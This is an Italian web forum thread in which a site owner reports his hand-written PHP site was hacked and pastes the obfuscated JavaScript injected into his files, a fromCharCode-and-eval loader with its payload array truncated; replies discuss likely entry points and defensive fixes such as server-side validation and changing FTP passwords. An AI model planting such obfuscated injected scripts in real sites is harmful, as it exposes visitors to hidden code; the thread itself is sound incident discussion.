Pagina 1 di 2 1 2 ultimoultimo
Visualizzazione dei risultati da 1 a 10 su 12
  1. #1

    sito hackerato #8f4d8e#

    salve,
    ho un sito che è stato bucato e trovo nei file php il seguente script
    Codice PHP:
    #8f4d8e# echo "<script type=\"text/javascript\" language=\"javascript\" >ff=String;fff=\"fromCharCode\";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v=\"eval\";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{}catch(q){asd=1;}if(!asd){w={a:window}.a;vv=v;}}e=w[vv];if(1){f=new Array(050,0146,ecc...);}w=f;s=[];if(window.document)for(i=2-2;-i+478!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]);}xz=e;if(v)xz(s)}</script>"; #/8f4d8e# 
    non riesco proprio a capire chi scrive sui file php
    c'è una form con la possibilità di fare upload ma c'è un controllo dei file inviati
    www.contabilitafacile.it

  2. #2
    Utente di HTML.it L'avatar di homerbit
    Registrato dal
    Dec 2005
    residenza
    Roma
    Messaggi
    1,380
    se l'unico punto di accesso è il form, allora, a parte potenziali bug del server, è lui il primo ad essere sospettato.
    Ma hai dato a disposizione poche notizie infatti sarebbe di grande aiuto conoscere la struttura del sito, se è un cms, se è uno script scaricato da qualche parte, versione del php, tipo di query (se esistono) utilizzate, se ha un template personalizzabile via backend, ecc ecc.

    Il bug purtroppo può insediarsi ovunque.
    If you think your users are idiots, only idiots will use it. DropBox

  3. #3
    grazie
    quello che non riesco a capire e come sono entrati...

    il server non lo gestisco io e quindi non ho nemmeno l'accesso

    purtroppo non accesso nemmeno ai log

    i sito è scritto in php da me, niente cms

    ho nella form ho disabilitato l'upload del file...
    www.contabilitafacile.it

  4. #4
    Utente di HTML.it L'avatar di homerbit
    Registrato dal
    Dec 2005
    residenza
    Roma
    Messaggi
    1,380
    se hai solo il form, disabilita temporaneamente l'upload (magari lo controlli con calma) poi potresti anche tener traccia di chi prova a compilarlo creando un file di log
    Disabilita i permessi di scrittura a tutti i files e cartelle che devono essere acceduti solo in lettura. Prova anche a sentire il provider.
    If you think your users are idiots, only idiots will use it. DropBox

  5. #5
    Utente di HTML.it
    Registrato dal
    Jan 2010
    residenza
    Pianeta Terra
    Messaggi
    1,614
    Per rendere sicuro un form, basta inserire degli opportuni controlli per l'inserimento dati nei campi, cosi vai sul sicuro.

    Esempio (per farlo proprio stretto):

    codice:
    preg_replace("/[^A-Za-z0-9]/", "", $il_tuo_campo)
    Se ti va, posta il codice

    saluti
    Per una bella risata vai QUI

  6. #6
    Utente di HTML.it L'avatar di boots
    Registrato dal
    Oct 2012
    Messaggi
    1,626
    Secondo me, in questi casi sono riusciti ad avere accesso via ftp: o ti hanno rubato le password o bucato il server ftp del provider.

    Di solito il proprietario dei file/cartelle non è lo stesso che fa "girare" il server web, in questo modo anche eseguendo codice malevolo questi non può modificare i file presenti.

    Discorso diverso se hai dato i permessi di scrittura ai tuoi file

  7. #7
    il controllo iniziale del form lo faccio via js

    il preg_replace dovrei metterlo nella action della form?

    grazie
    www.contabilitafacile.it

  8. #8
    Originariamente inviato da boots
    Secondo me, in questi casi sono riusciti ad avere accesso via ftp: o ti hanno rubato le password o bucato il server ftp del provider.

    Di solito il proprietario dei file/cartelle non è lo stesso che fa "girare" il server web, in questo modo anche eseguendo codice malevolo questi non può modificare i file presenti.

    Discorso diverso se hai dato i permessi di scrittura ai tuoi file
    ad esempio modificano il .htaccess che ha 0644 come diritti...
    anche io credo che abbiano bucato il server o hanno avuto accesso al ftp...
    infatti ho chiesto la modifica della password al provider... ma non ho ancora avuto risposta

    grazie
    www.contabilitafacile.it

  9. #9
    Utente di HTML.it L'avatar di homerbit
    Registrato dal
    Dec 2005
    residenza
    Roma
    Messaggi
    1,380
    Originariamente inviato da Fumocamel
    il controllo iniziale del form lo faccio via js

    il preg_replace dovrei metterlo nella action della form?

    grazie
    questo tuo messaggio mi fa pensare....
    pensare che il codice non sia sicuro, quindi ti consiglio, se ti va, di postare qui le sezioni di codice che inseriscono valori in files e db. In poche parole cosa c'è oltre al form? Come validi questo form? Altrimenti non ne esci.
    Cmq il preg_replace suggeritoti è un filtro sul valore insertio nel campo del form sia che esso provenga da $_POST (come in questo caso) che da $_GET
    If you think your users are idiots, only idiots will use it. DropBox

  10. #10
    Utente di HTML.it
    Registrato dal
    Jan 2010
    residenza
    Pianeta Terra
    Messaggi
    1,614
    Non puoi mai fare un controllo di un form PHP con il solo JS.

    Basterebbe disabilitare JS e il controllo non esiste più.

    JS, jquery e tutte queste cose non sono proprio essenziali; fanno "bella scena", bei effetti ma nulla di più.

    Dove devi mettere i controlli php, dipende tutto com'è strutturato il tuo formulario.


    infatti ho chiesto la modifica della password al provider... ma non ho ancora avuto risposta
    Ma dove stai? La password ed il nome te la puoi modificare in ogni momento tu stesso.
    Se cosi non è, cambia hosting al volo.

    qualunque password dovrebbe contenere SEMPRE caratteri speciali, numeri, lettere e di tutto e di più.

    Esempio: $&qualDcome$568££

    Saluti
    Per una bella risata vai QUI

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  
Powered by vBulletin® Version 4.2.1
Copyright © 2024 vBulletin Solutions, Inc. All rights reserved.